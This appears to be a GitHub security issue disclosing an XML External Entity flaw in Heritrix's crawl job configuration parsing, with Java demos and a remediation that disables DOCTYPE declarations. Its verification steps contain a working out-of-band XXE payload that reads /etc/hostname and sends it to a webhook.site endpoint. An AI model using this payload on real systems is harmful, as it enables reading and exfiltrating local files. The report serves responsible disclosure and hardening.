(SECURITY) XML External Entity (XXE) vulnerability in CrawlJob XML parsing #711

@b3at1

Description

I'll preface this by saying that, yes, I've read security.md, and this seems to fall under the elephant in the room, but I thought it was still worth a bug report.

XXE to LFI in Heritrix-3.14.0:

Impact:

Although this class of vulnerability is normally rated high severity, the practical impact here is low, because only authorized Heritrix users should have permission to modify crawler-beans.cxml. As far as I can tell, exploiting it requires write access to that file.

Verification:

  1. Download the latest version of Heritrix and set it up as specified here.
  2. Go to https://webhook.site to get a temporary endpoint.
  3. Click 'Edit' and paste the following into the content field:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "
<!ENTITY &#x25; exfil SYSTEM 'https://webhook.site/<YOUR UUID>/?d=%file;'>">
%eval;
%exfil;

  4. Set the content type to application/octet-stream.
  5. Add the following to the crawler configuration (crawler-beans.cxml), after the XML declaration and before the root element:

<!DOCTYPE beans [
  <!ENTITY % xxe SYSTEM "https://webhook.site/<YOUR UUID>">
  %xxe;
]>
  6. Whenever the job is built (or, really, whenever the XML is parsed at all), the parser fetches the external DTD and sends the contents of the file named in it (/etc/hostname here) to the webhook URL.
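
The steps above only work because the parser honors the DOCTYPE in the first place. As a rough, harmless illustration, the sketch below parses a document with a default-configured JAXP DocumentBuilder and shows that an entity declared in the DOCTYPE is expanded. It uses an internal entity only, so nothing is read from disk or sent over the network. The class and method names are made up for this example, and it assumes (not verified against CrawlJob.java) that the job configuration is parsed with a similarly default-configured parser.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical demo class; not part of Heritrix.
public class DefaultParserDemo {

    // Parses the XML with an unmodified (default) factory and returns
    // the text content of the root element.
    static String parseRootText(String xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder db = dbf.newDocumentBuilder();
        Document doc = db.parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Internal entity only: safe to run, no file or network access.
        String xml = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE beans [<!ENTITY greeting \"expanded\">]>"
                + "<beans>&greeting;</beans>";
        // The DOCTYPE is processed and the entity reference is replaced.
        System.out.println(parseRootText(xml));
    }
}
```

With an external parameter entity in place of the internal one, the same default behavior is what lets the parser fetch the remote DTD.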

Remediation:

To mitigate this vulnerability, disable DOCTYPE declarations by setting the XML parser feature http://apache.org/xml/features/disallow-doctype-decl to true in CrawlJob.java. This prevents both XXE attacks and related XML-based DoS vectors (e.g., Billion Laughs).
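
A minimal sketch of that setting, assuming the configuration is parsed through a JAXP DocumentBuilderFactory (I have not confirmed the exact call site in CrawlJob.java). The class and helper names are hypothetical; only the feature URI comes from the recommendation above.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical helper class; not part of Heritrix.
public class HardenedParser {

    // Builds a parser that refuses any document containing a DOCTYPE.
    static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return dbf.newDocumentBuilder();
    }

    // Returns true if the hardened parser rejects the document.
    static boolean rejects(String xml) throws Exception {
        try {
            newHardenedBuilder().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            // Thrown as soon as the DOCTYPE is seen, before any entity is resolved.
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        String withDoctype = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE beans [<!ENTITY x \"y\">]>"
                + "<beans>&x;</beans>";
        String plain = "<?xml version=\"1.0\"?><beans/>";
        System.out.println("DOCTYPE rejected: " + rejects(withDoctype));
        System.out.println("plain rejected:   " + rejects(plain));
    }
}
```

Because the parse fails at the DOCTYPE itself, neither the remote DTD nor the local file is ever requested.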

Before implementing, verify that no legitimate functionality depends on external entity resolution. It didn't seem to be the case here, but it's something to consider.
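
One rough way to run that check is to scan existing job configurations for DOCTYPE declarations before turning the feature on. The sketch below is only an illustration: the class name, the default "jobs" directory, and the plain substring match are all assumptions, and a substring match will also flag a DOCTYPE that appears inside a comment.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.List;
import java.util.stream.Collectors;
import java.util.stream.Stream;

// Hypothetical helper class; not part of Heritrix.
public class DoctypeScan {

    // Returns the .cxml files under root whose text contains "<!DOCTYPE".
    static List<Path> findDoctypeUsers(Path root) throws IOException {
        try (Stream<Path> paths = Files.walk(root)) {
            return paths
                    .filter(Files::isRegularFile)
                    .filter(p -> p.getFileName().toString().endsWith(".cxml"))
                    .filter(DoctypeScan::containsDoctype)
                    .sorted()
                    .collect(Collectors.toList());
        }
    }

    private static boolean containsDoctype(Path p) {
        try {
            String text = new String(Files.readAllBytes(p), StandardCharsets.UTF_8);
            return text.contains("<!DOCTYPE");
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) throws IOException {
        // "jobs" is an assumed default; pass the real jobs directory as an argument.
        Path root = Paths.get(args.length > 0 ? args[0] : "jobs");
        if (!Files.isDirectory(root)) {
            System.err.println("Not a directory: " + root);
            return;
        }
        for (Path p : findDoctypeUsers(root)) {
            System.out.println("Uses DOCTYPE: " + p);
        }
    }
}
```

If the scan finds nothing, existing jobs should keep loading once DOCTYPE declarations are disallowed.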
